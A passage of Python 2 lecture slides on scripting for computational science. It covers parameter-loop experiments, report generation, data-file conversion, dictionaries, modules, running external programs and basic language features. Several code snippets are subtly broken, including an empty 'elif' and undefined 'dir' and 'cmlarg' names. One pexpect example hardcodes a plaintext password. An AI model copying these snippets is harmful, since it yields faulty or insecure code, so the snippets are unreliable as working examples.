    html.write('<H1>m=%g</H1> <IMG SRC="%s">\n' \
         % (m,os.path.join(case,case+'.png')))
    m += dm
html.write('</BODY></HTML>\n')



Collecting plots in a PostScript file

For compact printing a PostScript file with small-sized versions of all the plots is useful
epsmerge (Perl script) is an appropriate tool:
# concatenate file1.ps, file2.ps, and so on to 
# one single file figs.ps, having pages with 
# 3 rows with 2 plots in each row (-par preserves 
# the aspect ratio of the plots)

epsmerge -o figs.ps -x 2 -y 3 -par \
         file1.ps file2.ps file3.ps ...
Can use this technique to make a compact report of the generated PostScript files for easy printing



Implementation of ps-file report

psfiles = []  # plot files in PostScript format
...
while m <= m_max:
    case = 'tmp_m_%g' % m
    ...
    psfiles.append(os.path.join(case,case+'.ps'))
    ...
...
s = 'epsmerge -o tmp_mruns.ps -x 2 -y 3 -par ' + \
    ' '.join(psfiles)
failure, output = commands.getstatusoutput(s)



Animated GIF file

When we vary m, wouldn't it be nice to see progressive plots put together in a movie?
Can combine the PNG files together in an animated GIF file:
convert -delay 50 -loop 1000 -crop 0x0 \
        plot1.png plot2.png plot3.png plot4.png ...  movie.gif

animate movie.gif  # or display movie.gif
(convert and animate are ImageMagick tools)
Collect all PNG filenames in a list and join the list items (as in the generation of the ps-file report)



Some improvements

Enable loops over an arbitrary parameter (not only m)
# easy:
'-m %g' % m
# is replaced with
'-%s %s' % (str(prm_name), str(prm_value))
# prm_value plays the role of the m variable
# prm_name ('m', 'b', 'c', ...) is read as input
Keep the range of the y axis fixed (for movie)
Files:
simviz1.py  : run simulation and visualization
simviz2.py  : additional option for yaxis scale

loop4simviz1.py : m loop calling simviz1.py
loop4simviz2.py : loop over any parameter in
                  simviz2.py and make movie



Playing around with experiments

We can perform lots of different experiments:

Study the impact of increasing the mass:
./loop4simviz2.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot
Study the impact of a nonlinear spring:
./loop4simviz2.py c 5 30 2 -yaxis -0.7 0.7 -b 0.5 \
                  -func siny -noscreenplot
Study the impact of increasing the damping:
./loop4simviz2.py b 0 2 0.25 -yaxis -0.5 0.5 -A 4
(loop over b, from 0 to 2 in steps of 0.25)



Remarks

Reports:
tmp_c.gif          # animated GIF (movie)
animate tmp_c.gif

tmp_c_runs.html    # browsable HTML document
tmp_c_runs.ps      # all plots in a ps-file
All experiments are archived in a directory with a filename reflecting the varying parameter:
tmp_m_2.1   tmp_b_0   tmp_c_29
All generated files/directories start with tmp so it is easy to clean up hundreds of experiments
Try the listed loop4simviz2.py commands!!



Exercise

Make a summary report with the equation, a picture of the system, the command-line arguments, and a movie of the solution
Make a link to a detailed report with plots of all the individual experiments
Demo:
./loop4simviz2_2html.py m 0.1 6.1 0.5 -yaxis -0.5 0.5 -noscreenplot
ls -d tmp_*
mozilla tmp_m_summary.html



Increased quality of scientific work

Archiving of experiments and having a system for uniquely relating input data to visualizations or result files are fundamental for reliable scientific investigations
The experiments can easily be reproduced
New (large) sets of experiments can be generated
We make tailored tools for investigating results
All these items contribute to increased quality of numerical experimentation



New example: converting data file formats

Input file with time series data:
some comment line
1.5
  measurements  model1 model2
     0.0         0.1    1.0
     0.1         0.1    0.188
     0.2         0.2    0.25
Contents: comment line, time step, headings, time series data
Goal: split file into two-column files, one for each time series
Script: interpret input file, split text, extract data and write files



Example on an output file

The model1.dat file, arising from column no 2, becomes
0    0.1
1.5  0.1
3    0.2
The time step parameter, here 1.5, is used to generate the first column



Program flow

Read inputfile name (1st command-line arg.)
Open input file
Read and skip the 1st (comment) line
Extract time step from the 2nd line
Read time series names from the 3rd line
Make a list of file objects, one for each time series
Read the rest of the file, line by line:

split lines into y values
write t and y value to file, for all series
File: src/py/intro/convert1.py



What to learn

Reading and writing files
Sublists
List of file objects
Dictionaries
Arrays of numbers
List comprehension
Refactoring a flat script as functions in a module



Reading in the first 3 lines

Open file and read comment line:
infilename = sys.argv[1]
ifile = open(infilename, 'r') # open for reading
line = ifile.readline()
Read time step from the next line:
dt = float(ifile.readline())
Read next line containing the curvenames:
ynames = ifile.readline().split()



Output to many files

Make a list of file objects for output of each time series:
outfiles = []
for name in ynames:
    outfiles.append(open(name + '.dat', 'w'))



Writing output

Read each line, split into y values, write to output files:
t = 0.0    # t value
# read the rest of the file line by line:
while 1:
    line = ifile.readline()
    if not line: break

    yvalues = line.split()

    # skip blank lines:
    if len(yvalues) == 0: continue  

    for i in range(len(outfiles)):
        outfiles[i].write('%12g %12.5e\n' % \
                          (t, float(yvalues[i])))
    t += dt

for file in outfiles:  
    file.close()



Dictionaries

Dictionary = array with a text as index
Also called hash or associative array in other languages
Can store 'anything':
prm['damping'] = 0.2             # number

def x3(x): 
    return x*x*x
prm['stiffness'] = x3            # function object

prm['model1'] = [1.2, 1.5, 0.1]  # list object
The text index is called key



Dictionaries for our application

Could store the time series in memory as a dictionary of lists; the list items are the y values and the y names are the keys
y = {}           # declare empty dictionary
# ynames: names of y curves
for name in ynames:
    y[name] = [] # for each key, make empty list

lines = ifile.readlines()  # list of all lines
...
for line in lines[3:]:
    yvalues = [float(x) for x in line.split()]
    i = 0  # counter for yvalues
    for name in ynames:
        y[name].append(yvalues[i]); i += 1
File: src/py/intro/convert2.py



Dissection of the previous slide

Specifying a sublist, e.g., the 4th line until the last line: lines[3:] Transforming all words in a line to floats:
yvalues = [float(x) for x in line.split()]

# same as
numbers = line.split()
yvalues = []
for s in numbers:
    yvalues.append(float(s))



The items in a dictionary

The input file
some comment line
1.5
  measurements  model1 model2
     0.0         0.1    1.0
     0.1         0.1    0.188
     0.2         0.2    0.25
results in the following y dictionary:
'measurements': [0.0, 0.1, 0.2], 
'model1':       [0.1, 0.1, 0.2], 
'model2':       [1.0, 0.188, 0.25]
(this output is plain print: print y)



Remarks

Fortran/C programmers tend to think of indices as integers
Scripters make heavy use of dictionaries and text-type indices (keys)
Python dictionaries can use (almost) any object as key (!)
A dictionary is also often called hash (e.g. in Perl) or associative array
Examples will demonstrate their use



Next step: make the script reusable

The previous script is ``flat''
(start at top, run to bottom)
Parts of it may be reusable
We may like to load data from file, operate on data, and then dump data
Let's refactor the script:

make a load data function
make a dump data function
collect these two functions in a reusable module



The load data function

def load_data(filename):
    f = open(filename, 'r'); lines = f.readlines(); f.close()
    dt = float(lines[1])
    ynames = lines[2].split()
    y = {}
    for name in ynames:  # make y a dictionary of (empty) lists
        y[name] = []

    for line in lines[3:]:
        yvalues = [float(yi) for yi in line.split()]
        if len(yvalues) == 0: continue  # skip blank lines
        for name, value in zip(ynames, yvalues):
            y[name].append(value)
    return y, dt



How to call the load data function

Note: the function returns two (!) values;
a dictionary of lists, plus a float
It is common that output data from a Python function are returned, and multiple data structures can be returned (actually packed as a tuple, a kind of ``constant list'')
Here is how the function is called:
y, dt = load_data('somedatafile.dat')
print y
Output from print y:
>>> y
{'tmp-model2': [1.0, 0.188, 0.25], 
'tmp-model1': [0.10000000000000001, 0.10000000000000001, 
               0.20000000000000001], 
'tmp-measurements': [0.0, 0.10000000000000001, 0.20000000000000001]}



Iterating over several lists

C/C++/Java/Fortran-like iteration over two arrays/lists:
for i in range(len(list)):
    e1 = list1[i];  e2 = list2[i]
    # work with e1 and e2
Pythonic version:
for e1, e2 in zip(list1, list2):
    # work with element e1 from list1 and e2 from list2
For example,
for name, value in zip(ynames, yvalues):
    y[name].append(value)



The dump data function

def dump_data(y, dt):
    # write out 2-column files with t and y[name] for each name:
    for name in y.keys():
        ofile = open(name+'.dat', 'w')
        for k in range(len(y[name])):
            ofile.write('%12g %12.5e\n' % (k*dt, y[name][k]))
        ofile.close()



Reusing the functions

Our goal is to reuse load_data and dump_data, possibly with some operations on y in between:
from convert3 import load_data, dump_data

y, timestep = load_data('.convert_infile1')

from math import fabs
for name in y:  # run through keys in y
    maxabsy = max([fabs(yval) for yval in y[name]])
    print 'max abs(y[%s](t)) = %g' % (name, maxabsy)

dump_data(y, timestep)
Then we need to make a module convert3!



How to make a module

Collect the functions in the module in a file, here the file is called convert3.py
We have then made a module convert3
The usage is as exemplified on the previous slide



Module with application script

The scripts convert1.py and convert2.py load and dump data - this functionality can be reproduced by an application script using convert3
The application script can be included in the module:
if __name__ == '__main__':
    import sys
    try:     
        infilename = sys.argv[1]
    except:  
        usage = 'Usage: %s infile' % sys.argv[0]
        print usage; sys.exit(1)
    y, dt = load_data(infilename)
    dump_data(y, dt)
If the module file is run as a script, the if test is true and the application script is run
If the module is imported in a script, the if test is false and no statements are executed



Usage of convert3.py

As script:
unix> ./convert3.py someinputfile.dat
As module:
import convert3
y, dt = convert3.load_data('someinputfile.dat')
# do more with y?
dump_data(y, dt)
The application script at the end also serves as an example on how to use the module



How to solve exercises

Construct an example on the functionality of the script, if that is not included in the problem description
Write very high-level pseudo code with words
Scan known examples for constructions and functionality that can come into use
Look up man pages, reference manuals, FAQs, or textbooks for functionality you have minor familiarity with, or to clarify syntax details
Search the Internet if the documentation from the latter point does not provide sufficient answers



Example: write a join function

Exercise:
Write a function myjoin that concatenates a list of strings to a single string, with a specified delimiter between the list elements. That is, myjoin is supposed to be an implementation of a string's join method in terms of basic string operations.
Functionality:
s = myjoin(['s1', 's2', 's3'], '*')
# s becomes 's1*s2*s3'



The next steps

Pseudo code:
function myjoin(list, delimiter)
  joined = first element in list
  for element in rest of list:
    concatenate joined, delimiter and element
  return joined
Known examples: string concatenation (+ operator) from hw.py, list indexing (list[0]) from datatrans1.py, sublist extraction (list[1:]) from convert1.py, function construction from datatrans1.py



Refined pseudo code

def myjoin(list, delimiter):
  joined = list[0]
  for element in list[1:]:
    joined += delimiter + element
  return joined
That's it!



How to present the answer to an exercise

Use comments to explain ideas
Use descriptive variable names to reduce the need for more comments
Find generic solutions (unless the code size explodes)
Strive at compact code, but not too compact
Invoke the Python interpreter and run import this
Always construct a demonstrating running example and include in it the source code file inside triple-quoted strings:
"""
unix> python hw.py 3.1459
Hello, World! sin(3.1459)=-0.00430733309102
"""



How to print exercises with a2ps

Here is a suitable command for printing exercises for a week:
unix> a2ps --line-numbers=1 -4 -o outputfile.ps *.py
This prints all *.py files, with 4 (because of -4) pages per sheet
See man a2ps for more info about this command
In every exercise you also need examples on how a script is run and what the output is -- one recommendation is to put all this info (cut from the terminal window and pasted in your editor) in a triple double quoted Python string (such a string can be viewed as example/documentation/comment as it does not affect the behavior of the script)





Frequently encountered tasks in Python




Overview

running an application
file reading and writing
list and dictionary operations
splitting and joining text
basics of Python classes
writing functions
file globbing, testing file types
copying and renaming files, creating and moving to directories, creating directory paths, removing files and directories
directory tree traversal
parsing command-line arguments



Python programming information

Man-page oriented information:

pydoc somemodule.somefunc, pydoc somemodule
doc.html! Links to lots of electronic information
The Python Library Reference (go to the index)
Python in a Nutshell
Beazley's Python reference book
Your favorite Python language book
Google
These slides (and exercises) are closely linked to the ``Python scripting for computational science'' book, ch. 3 and 8



Demo of the result of Python statements

We requently illustrate Python constructions in the interactive shell
Recommended shells: IDLE or IPython
Examples (using standard prompt, not default IPython look):
>>> t = 0.1
>>> def f(x):
...     return math.sin(x)
...
>>> f(t)
0.099833416646828155
>>> os.path.splitext('/some/long/path/myfile.dat')
('/some/long/path/myfile', '.dat')
Help in the shell:
>>> help(os.path.splitext)



Preprocessor

  • C and C++ programmers heavily utilize the ``C preprocessor'' for including files, excluding code blocks, defining constants, etc.

  • preprocess is a (Python!) program that provides (most) ``C preprocessor'' functionality for Python, Perl, Ruby, shell scripts, makefiles, HTML, Java, JavaScript, PHP, Fortran, C, C++, ... (!)

  • preprocess directives are typeset within comments

  • Most important directives: include, if/ifdef/ifndef/else/endif, define

  • See pydoc preprocess for documentation
    # #if defined('DEBUG') and DEBUG >= 2
    # write out debug info at level 2:
    ...
    # #elif DEBUG == 0
    # write out minimal debug info:
    ...
    # #else
    # no debug output
    # #endif
    
    preprocess -DDEBUG=1 pyscript.p.py > pyscript.py

  • preprocess cannot do macros with arguments



    How to use the preprocessor

  • Include documentation or common code snippets in several files
    #  #include "myfile.py"
    

  • Exclude/include code snippets according to an variable (its value or just if the variable is defined)
    # #ifdef MyDEBUG
    ....debug code....
    # #endif
    

  • Define variables with optional value
    # #define MyDEBUG
    
    # #define MyDEBUG 2
    
    Such preprocessor variables can also be defined on the command line
    preprocess -DMyDEBUG=2 myscript.p.py > myscript.py
    

  • Naming convention: .p.py files are input



    Running an application

    Run a stand-alone program:
    cmd = 'myprog -c file.1 -p -f -q > res'
    failure = os.system(cmd)
    if failure:
      print '%s: running myprog failed' % sys.argv[0]
      sys.exit(1)
    
    Redirect output from the application to a list of lines:
    pipe = os.popen(cmd)
    output = pipe.readlines()
    pipe.close()
    
    for line in output:
      # process line
    

  • Better tool: the commands module (next slide)



    Running applications and grabbing the output

    Best way to execute another program:
    import commands
    failure, output = commands.getstatusoutput(cmd)
    
    if failure:
        print 'Could not run', cmd; sys.exit(1)
    
    for line in output.splitlines()  # or output.split('\n'):
        # process line
    
    (output holds the output as a string)
    output holds both standard error and standard output
    (os.popen grabs only standard output so you do not see error messages)



    Running applications in the background

    os.system, pipes, or commands.getstatusoutput terminates after the command has terminated
    There are two methods for running the script in parallel with the command:

    run the command in the background
    Unix:     add an ampersand (&) at the end of the command
    Windows:  run the command with the 'start' program
    
    run the operating system command in a separate thread
    More info: see ``Platform-dependent operations'' slide and the threading module



    Pipes

    Open (in a script) a dialog with an interactive program:
    gnuplot = os.popen('gnuplot -persist', 'w')
    gnuplot.write("""
    set xrange [0:10]; set yrange [-2:2]
    plot sin(x)
    quit
    """)
    gnuplot.close()  # gnuplot is now run with the written input
    
    Same as "here documents" in Unix shells:
    gnuplot <<EOF
    set xrange [0:10]; set yrange [-2:2]
    plot sin(x)
    quit
    EOF
    



    Writing to and reading from applications

    There are popen modules that allows us to have two-way comminucation with an application (read/write), but this technique is not suitable for reliable two-way dialog (easy to get hang-ups)
    The pexpect module is the right tool for a two-way dialog with a stand-alone application
    # copy files to remote host via scp and password dialog
    cmd = 'scp %s %s@%s:%s' % (filename, user, host, directory)
    import pexpect
    child = pexpect.spawn(cmd)
    child.expect('password:')
    child.sendline('&%$hQxz?+MbH')
    child.expect(pexpect.EOF)  # important; wait for end of scp session
    child.close()
    

  • Complete example: simviz1.py version that runs oscillator on a remote machine (``supercomputer'') via pexpect:
    src/py/examples/simviz/simviz1_ssh_pexpect.py
    



    File reading

    Load a file into list of lines:
    infilename = '.myprog.cpp'
    infile = open(infilename, 'r')  # open file for reading 
    
    # load file into a list of lines:
    lines = infile.readlines()    
    
    # load file into a string:
    filestr = infile.read()
    
    Line-by-line reading (for large files):
    while 1:
        line = infile.readline()
        if not line: break
        # process line
    



    File writing

    Open a new output file:
    outfilename = '.myprog2.cpp'
    outfile = open(outfilename, 'w')
    outfile.write('some string\n')
    
    Append to existing file:
    outfile = open(outfilename, 'a')
    outfile.write('....')
    



    Python types

  • Numbers: float, complex, int (+ bool)

  • Sequences: list, tuple, str, NumPy arrays

  • Mappings: dict (dictionary/hash)

  • Instances: user-defined class

  • Callables: functions, callable instances



    Numerical expressions

    Python distinguishes between strings and numbers:
    b =  1.2       # b is a number
    b = '1.2'      # b is a string
    a = 0.5 * b    # illegal: b is NOT converted to float
    a = 0.5 * float(b)   # this works
    
    All Python objects are compard with
    ==   !=  <  >  <=  >=
    



    Potential confusion

    Consider:
    b = '1.2'
    
    if b < 100:    print b, '< 100'
    else:          print b, '>= 100'
    
    What do we test? string less than number!
    What we want is
    if float(b) < 100:   # floating-point number comparison
    # or
    if b < str(100):     # string comparison
    



    Boolean expressions

  • bool is True or False

  • Can mix bool with int 0 (false) or 1 (true)

  • Boolean tests:
    a = '';  a = [];  a = ();  a = {};  # empty structures
    a = 0;   a = 0.0
    if a:       # false
    if not a:   # true
    
    other values of a: if a is true



    Setting list elements

    Initializing a list:
    arglist = [myarg1, 'displacement', "tmp.ps"]
    
    Or with indices (if there are already two list elements):
    arglist[0] = myarg1
    arglist[1] = 'displacement'
    
    Create list of specified length:
    n = 100
    mylist = [0.0]*n
    
    Adding list elements:
    arglist = []  # start with empty list
    arglist.append(myarg1)
    arglist.append('displacement')
    



    Getting list elements

    Extract elements form a list:
     filename, plottitle, psfile  = arglist
    (filename, plottitle, psfile) = arglist
    [filename, plottitle, psfile] = arglist
    
    Or with indices:
    filename = arglist[0]
    plottitle = arglist[1]
    



    Traversing lists

    For each item in a list:
    for entry in arglist:
        print 'entry is', entry
    
    For-loop-like traversal:
    start = 0;  stop = len(arglist);  step = 1
    for index in range(start, stop, step):
        print 'arglist[%d]=%s' % (index,arglist[index])
    
    Visiting items in reverse order:
    mylist.reverse()  # reverse order
    for item in mylist:
        # do something...
    



    List comprehensions

  • Compact syntax for manipulating all elements of a list:
    y = [ float(yi) for yi in line.split() ]  # call function float
    x = [ a+i*h for i in range(n+1) ]         # execute expression
    
    (called list comprehension)

  • Written out:
    y = []
    for yi in line.split():
        y.append(float(yi))
    
    etc.



    Map function

  • map is an alternative to list comprehension:
    y = map(float, line.split())
    y = map(lambda i: a+i*h, range(n+1))
    

  • map is faster than list comprehension but not as easy to read



    Typical list operations

    d = []           # declare empty list
    
    d.append(1.2)    # add a number 1.2
    
    d.append('a')    # add a text
    
    d[0] = 1.3       # change an item
    
    del d[1]         # delete an item
    
    len(d)           # length of list
    



    Nested lists

    Lists can be nested and heterogeneous
    List of string, number, list and dictionary:
    >>> mylist = ['t2.ps', 1.45, ['t2.gif', 't2.png'],\
              { 'factor' : 1.0, 'c' : 0.9} ]
    >>> mylist[3]
    {'c': 0.90000000000000002, 'factor': 1.0}
    >>> mylist[3]['factor']
    1.0
    >>> print mylist
    ['t2.ps', 1.45, ['t2.gif', 't2.png'], 
     {'c': 0.90000000000000002, 'factor': 1.0}]
    
    Note: print prints all basic Python data structures in a nice format



    Sorting a list

    In-place sort:
    mylist.sort()
    
    modifies mylist!
    >>> print mylist
    [1.4, 8.2, 77, 10]
    >>> mylist.sort()
    >>> print mylist
    [1.4, 8.2, 10, 77]
    
    Strings and numbers are sorted as expected



    Defining the comparison criterion

    # ignore case when sorting:
    
    def ignorecase_sort(s1, s2): 
        s1 = s1.lower()
        s2 = s2.lower()
        if   s1 <  s2: return -1
        elif s1 == s2: return  0
        else:          return  1
    
    # or a quicker variant, using Python's built-in
    # cmp function:
    def ignorecase_sort(s1, s2): 
        s1 = s1.lower();  s2 = s2.lower()
        return cmp(s1,s2)
    
    # usage:
    mywords.sort(ignorecase_sort)
    



    Tuples ('constant lists')

    Tuple = constant list; items cannot be modified
    >>> s1=[1.2, 1.3, 1.4]   # list
    >>> s2=(1.2, 1.3, 1.4)   # tuple
    >>> s2=1.2, 1.3, 1.4     # may skip parenthesis
    >>> s1[1]=0              # ok
    >>> s2[1]=0              # illegal
    Traceback (innermost last):
      File "<pyshell#17>", line 1, in ?
        s2[1]=0
    TypeError: object doesn't support item assignment
    
    >>> s2.sort()
    AttributeError: 'tuple' object has no attribute 'sort'
    
    You cannot append to tuples, but you can add two tuples to form a new tuple



    Dictionary operations

    Dictionary = array with text indices (keys)
    (even user-defined objects can be indices!)
    Also called hash or associative array
    Common operations:
    d['mass']           # extract item corresp. to key 'mass'
    d.keys()            # return copy of list of keys
    d.get('mass',1.0)   # return 1.0 if 'mass' is not a key
    d.has_key('mass')   # does d have a key 'mass'?
    d.items()           # return list of (key,value) tuples
    del d['mass']       # delete an item
    len(d)              # the number of items
    



    Initializing dictionaries

    Multiple items:
    d = { 'key1' : value1, 'key2' : value2 }
    
    Item by item (indexing):
    d['key1'] = anothervalue1
    d['key2'] = anothervalue2
    d['key3'] = value2
    



    Dictionary examples

    Problem: store MPEG filenames corresponding to a parameter with values 1, 0.1, 0.001, 0.00001
    movies[1]       = 'heatsim1.mpeg'
    movies[0.1]     = 'heatsim2.mpeg'
    movies[0.001]   = 'heatsim5.mpeg'
    movies[0.00001] = 'heatsim8.mpeg'
    
    Store compiler data:
    g77 = {
      'name'          : 'g77',
      'description'   : 'GNU f77 compiler, v2.95.4',
      'compile_flags' : ' -pg',
      'link_flags'    : ' -pg',
      'libs'          : '-lf2c',
      'opt'           : '-O3 -ffast-math -funroll-loops'
    }
    



    Another dictionary example (1)

    Idea: hold command-line arguments in a dictionary cmlargs[option], e.g., cmlargs['infile'], instead of separate variables
    Initialization: loop through sys.argv, assume options in pairs: --option value
    arg_counter = 1
    while arg_counter < len(sys.argv):
        option = sys.argv[arg_counter]    
        option = option[2:]  # remove double hyphen
        if option in cmlargs: 
    	# next command-line argument is the value:
            arg_counter += 1
    	value = sys.argv[arg_counter] 
            cmlargs[cmlarg] = value
        else:
            # illegal option
        arg_counter += 1
    



    Another dictionary example (2)

    Working with cmlargs in simviz1.py:
    f = open(cmlargs['case'] + '.', 'w')
    f.write(cmlargs['m']     + '\n')
    f.write(cmlargs['b']     + '\n')
    f.write(cmlargs['c']     + '\n')
    f.write(cmlargs['func']  + '\n')
    ...
    # make gnuplot script:
    f = open(cmlargs['case'] + '.gnuplot', 'w')
    f.write("""
    set title '%s: m=%s b=%s c=%s f(y)=%s A=%s w=%s y0=%s dt=%s';
    """ % (cmlargs['case'],cmlargs['m'],cmlargs['b'],
           cmlargs['c'],cmlargs['func'],cmlargs['A'],
           cmlargs['w'],cmlargs['y0'],cmlargs['dt']))
    if not cmlargs['noscreenplot']:
        f.write("plot 'sim.dat' title 'y(t)' with lines;\n")
    
    Note: all cmlargs[opt] are (here) strings!



    Environment variables

    The dictionary-like os.environ holds the environment variables:
    os.environ['PATH']
    os.environ['HOME']
    os.environ['scripting']
    
    Write all the environment variables in alphabethic order:
    sorted_env = os.environ.keys()
    sorted_env.sort()
    
    for key in sorted_env:
        print '%s = %s' % (key, os.environ[key])
    



    Find a program

    Check if a given program is on the system:
    program = 'vtk'
    path = os.environ['PATH']  
    # PATH can be /usr/bin:/usr/local/bin:/usr/X11/bin
    # os.pathsep is the separator in PATH 
    # (: on Unix, ; on Windows) 
    paths = path.split(os.pathsep)
    for d in paths:
        if os.path.isdir(d):
            if os.path.isfile(os.path.join(d, program)):
                 program_path = d; break
    
    try:  # program was found if program_path is defined
        print '%s found in %s' % (program, program_path)
    except:      
        print '%s not found' % program
    



    Cross-platform fix of previous script

    On Windows, programs usually end with .exe (binaries) or .bat (DOS scripts), while on Unix most programs have no extension
    We test if we are on Windows:
    if sys.platform[:3] == 'win':
        # Windows-specific actions
    
    Cross-platform snippet for finding a program:
    for d in paths:
        if os.path.isdir(d):
            fullpath = os.path.join(dir, program)
            if sys.platform[:3] == 'win':   # windows machine?
                for ext in '.exe', '.bat':  # add extensions
                    if os.path.isfile(fullpath + ext):
                        program_path = d; break
            else:
                if os.path.isfile(fullpath):
                    program_path = d; break
    



    Splitting text

    Split string into words:
    >>> files = 'case1.ps case2.ps    case3.ps'
    >>> files.split()
    ['case1.ps', 'case2.ps', 'case3.ps']
    
    Can split wrt other characters:
    >>> files = 'case1.ps, case2.ps, case3.ps'
    >>> files.split(', ')
    ['case1.ps', 'case2.ps', 'case3.ps']
    >>> files.split(',  ')  # extra erroneous space after comma...
    ['case1.ps, case2.ps, case3.ps']  # unsuccessful split
    
    Very useful when interpreting files



    Example on using split (1)

    Suppose you have file containing numbers only
    The file can be formatted 'arbitrarily', e.g,
    1.432 5E-09
    1.0
    
    3.2 5 69 -111
    4 7 8
    
    Get a list of all these numbers:
    f = open(filename, 'r')
    numbers = f.read().split()
    
    String objects's split function splits wrt sequences of whitespace (whitespace = blank char, tab or newline)



    Example on using split (2)

    Convert the list of strings to a list of floating-point numbers, using map:
    numbers = [ float(x) for x in f.read().split() ]
    
    Think about reading this file in Fortran or C!
    (quite some low-level code...)
    This is a good example of how scripting languages, like Python, yields flexible and compact code



    Joining a list of strings

    Join is the opposite of split:
    >>> line1 = 'iteration 12:    eps= 1.245E-05'
    >>> line1.split()
    ['iteration', '12:', 'eps=', '1.245E-05']
    >>> w = line1.split()
    >>> ' '.join(w)  # join w elements with delimiter ' '
    'iteration 12: eps= 1.245E-05'
    
    Any delimiter text can be used:
    >>> '@@@'.join(w)
    'iteration@@@12:@@@eps=@@@1.245E-05'
    



    Common use of join/split

    f = open('myfile', 'r')
    lines = f.readlines()            # list of lines
    filestr = ''.join(lines)         # a single string
    # can instead just do
    # filestr = file.read()
    
    # do something with filestr, e.g., substitutions...
    
    # convert back to list of lines:
    lines = filestr.splitlines() 
    for line in lines:
        # process line
    



    Text processing (1)

    Exact word match:
    if line == 'double':
       # line equals 'double'
    
    if line.find('double') != -1:
       # line contains 'double'
    
    Matching with Unix shell-style wildcard notation:
    import fnmatch
    if fnmatch.fnmatch(line, 'double'):
       # line contains 'double'
    
    Here, double can be any valid wildcard expression, e.g.,
    double*   [Dd]ouble
    



    Text processing (2)

    Matching with full regular expressions:
    import re
    if re.search(r'double', line): 
        # line contains 'double'
    
    Here, double can be any valid regular expression, e.g.,
    double[A-Za-z0-9_]*  [Dd]ouble  (DOUBLE|double)
    



    Substitution

    Simple substitution:
    newstring = oldstring.replace(substring, newsubstring)
    
    Substitute regular expression pattern by replacement in str:
    import re
    str = re.sub(pattern, replacement, str)
    



    Various string types

    There are many ways of constructing strings in Python:
    s1 = 'with forward quotes'
    s2 = "with double quotes"
    s3 = 'with single quotes and a variable: %(r1)g' \
         % vars()
    s4 = """as a triple double (or single) quoted string"""
    s5 = """triple double (or single) quoted strings
    allow multi-line text (i.e., newline is preserved)
    with other quotes like ' and  "
    """
    
    Raw strings are widely used for regular expressions
    s6 = r'raw strings start with r and \ remains backslash'
    s7 = r"""another raw string with a double backslash: \\ """
    



    String operations

    String concatenation:
    myfile = filename + '_tmp' + '.dat'
    
    Substring extraction:
    >>> teststr = '0123456789'
    >>> teststr[0:5]; teststr[:5]
    '01234'
    '01234'
    >>> teststr[3:8]
    '34567'
    >>> teststr[3:]
    '3456789'
    



    Mutable and immutable objects

    The items/contents of mutable objects can be changed in-place
    Lists and dictionaries are mutable
    The items/contents of immutable objects cannot be changed in-place
    Strings and tuples are immutable
    >>> s2=(1.2, 1.3, 1.4)   # tuple
    >>> s2[1]=0              # illegal
    



    Classes in Python

    Similar class concept as in Java and C++
    All functions are virtual
    No private/protected variables
    (the effect can be "simulated")
    Single and multiple inheritance
    Everything in Python is a class and works with classes
    Class programming is easier and faster than in C++ and Java (?)



    The basics of Python classes

    Declare a base class MyBase:
    class MyBase:
    
        def __init__(self,i,j):  # constructor
            self.i = i; self.j = j
    
        def write(self):         # member function
            print 'MyBase: i=',self.i,'j=',self.j
    
    self is a reference to this object
    Data members are prefixed by self:
    self.i, self.j
    All functions take self as first argument in the declaration, but not in the call
    obj1 = MyBase(6,9); obj1.write()
    



    Implementing a subclass

    Class MySub is a subclass of MyBase:
    class MySub(MyBase):
    
        def __init__(self,i,j,k):  # constructor
            MyBase.__init__(self,i,j)
            self.k = k;
     
       def write(self):
            print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
    
    Example:
    # this function works with any object that has a write func:
    def write(v): v.write()
    
    # make a MySub instance
    i = MySub(7,8,9)
    
    write(i)   # will call MySub's write
    



    Functions

    Python functions have the form
    def function_name(arg1, arg2, arg3):
        # statements
        return something
    
    Example:
    def debug(comment, variable):
        if os.environ.get('PYDEBUG', '0') == '1':
            print comment, variable
    ...
    v1 = file.readlines()[3:]
    debug('file %s (exclusive header):' % file.name, v1)
    
    v2 = somefunc()
    debug('result of calling somefunc:', v2)
    
    This function prints any printable object!



    Keyword arguments

    Can name arguments, i.e., keyword=default-value
    def mkdir(dirname, mode=0777, remove=1, chdir=1):
        if os.path.isdir(dirname):
            if remove:  shutil.rmtree(dirname)
            elif :      return 0  # did not make a new directory
        os.mkdir(dir, mode)
        if chdir: os.chdir(dirname)
        return 1      # made a new directory
    
    Calls look like
    mkdir('tmp1')
    mkdir('tmp1', remove=0, mode=0755)
    mkdir('tmp1', 0755, 0, 1)             # less readable
    
    Keyword arguments make the usage simpler and improve documentation



    Variable-size argument list

    Variable number of ordinary arguments:
    def somefunc(a, b, *rest):
        for arg in rest:
            # treat the rest...
    
    # call:
    somefunc(1.2, 9, 'one text', 'another text')
    #                ...........rest...........
    
    Variable number of keyword arguments:
    def somefunc(a, b, *rest, **kw):
        #...
        for arg in rest:
            # work with arg...
        for key in kw.keys():
            # work kw[key]
    



    Example

    A function computing the average and the max and min value of a series of numbers:
    def statistics(*args):
        avg = 0;  n = 0;   # local variables
        for number in args:  # sum up all the numbers
            n = n + 1; avg = avg + number
        avg = avg / float(n) # float() to ensure non-integer division
    
        min = args[0]; max = args[0]
        for term in args:
            if term < min: min = term
            if term > max: max = term
        return avg, min, max  # return tuple
    
    Usage:
    average, vmin, vmax = statistics(v1, v2, v3, b)
    



    The Python expert's version...

    The statistics function can be written more compactly using (advanced) Python functionality:
    def statistics(*args):
        return (reduce(operator.add, args)/float(len(args)), 
                min(args), max(args))
    
    reduce(op,a): apply operation op successively on all elements in list a (here all elements are added)
    min(a), max(a): find min/max of a list a



    Call by reference

    Python scripts normally avoid call by reference and return all output variables instead
    Try to swap two numbers:
    >>> def swap(a, b):
            tmp = b; b = a; a = tmp;
        
    >>> a=1.2; b=1.3; swap(a, b)
    >>> print a, b    # has a and b been swapped?
    (1.2, 1.3)  # no...
    
    The way to do this particular task
    >>> def swap(a, b):
        return (b,a)   # return tuple
    
    # or smarter, just say  (b,a) = (a,b)  or simply  b,a = a,b
    



    In-place list assignment

    Lists can be changed in-place in functions:
    >>> def somefunc(mutable, item, item_value):
    	mutable[item] = item_value
    	
    >>> a = ['a','b','c']  # a list
    >>> somefunc(a, 1, 'surprise')
    >>> print a
    ['a', 'surprise', 'c']
    
    This works for dictionaries as well
    (but not tuples) and instances of user-defined classes



    Input and output data in functions

  • The Python programming style is to have input data as arguments and output data as return values
    def myfunc(i1, i2, i3, i4=False, io1=0):
